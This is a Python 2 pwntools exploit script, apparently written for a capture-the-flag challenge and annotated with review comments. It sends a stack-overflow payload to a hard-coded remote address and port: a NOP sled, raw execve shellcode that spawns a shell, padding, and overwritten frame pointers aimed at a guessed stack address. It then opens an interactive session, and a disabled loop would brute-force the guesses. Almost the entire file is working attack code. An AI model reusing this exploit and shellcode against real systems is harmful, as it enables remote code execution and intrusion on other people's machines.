#!/usr/bin/env python2
from pwn import *
from struct import pack,unpack
# pwntools defaults for this script.
# NOTE(review): arch is set to 'i386' (32-bit) while every address below is
# packed as a 64-bit "<Q" value; the only pwntools calls in this file are
# remote()/sendline()/recvline()/interactive(), which do not appear to depend
# on arch, so the mismatch looks inert -- confirm before relying on it.
context(arch = 'i386', os = 'linux')#, log_level='debug')
def connect(offset):
    """Send one probe payload with a single stack-address guess.

    Builds a payload of a 0x90 (NOP) sled, 27 bytes of raw shellcode, 0x100
    bytes of 'b' padding and two packed little-endian 64-bit values, sends
    it as one line to the hard-coded remote host, sends an ``echo`` probe,
    prints the guessed address and then hands the socket to the user.

    Args:
        offset: multiplied by 0x100 and added to ``rsp_end`` to form the
            address written into the two trailing 8-byte fields.

    Returns:
        None. The ``return`` that would report whether the echo probe came
        back is commented out, so ``out`` is read but never used.

    On the wire, each call is one 0x410-byte line (0x300 + 0x100 + 8 + 8)
    that is mostly 0x90 bytes, followed by the line ``echo dupa``.
    """
    #x = process('./vuln')
    x = remote('35.205.206.137','1996')
    #raw_input("klik")
    #x.recv()
    # Sled of (0x300 - 27) NOP bytes; the 27 equals the length of the
    # shellcode string appended next, so sled + shellcode is exactly 0x300.
    a = '\x90' * (0x300-27)
    # Raw shellcode bytes, kept verbatim and not decoded here.
    a += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    a += 'b'*0x100
    # Base for the guess; presumably near the top of the target's stack
    # mapping -- nothing in this file confirms it.
    rsp_end = 0x7fffffff0000
    addr = rsp_end + offset * 0x100
    # Two little-endian 64-bit values; the one named rsp is 0x400 below the
    # one named rbp, which equals the sled + shellcode + padding length.
    rsp = pack("<Q", addr-0x400)
    rbp = pack("<Q", addr)
    a += rbp + rsp
    x.sendline(a)
    #x.sendline()
    # Probe command whose reply is read below but not acted on.
    x.sendline('echo dupa')
    out = x.recvline(timeout=1)
    # Python 2 print statement: the guessed address, 16 hex digits wide.
    print format(addr, '16x')
    #ireturn 'dupa' in out
    x.interactive()
# Single probe with a fixed guess. The loop over 0..0xfe that follows is
# disabled: it sits inside a bare string literal, so it never runs.
connect(0xee)
'''
for x in range(0,0xff):
print 'trying ' + str(x)
try:
if connect(x):
break
except EOFError:
pass
'''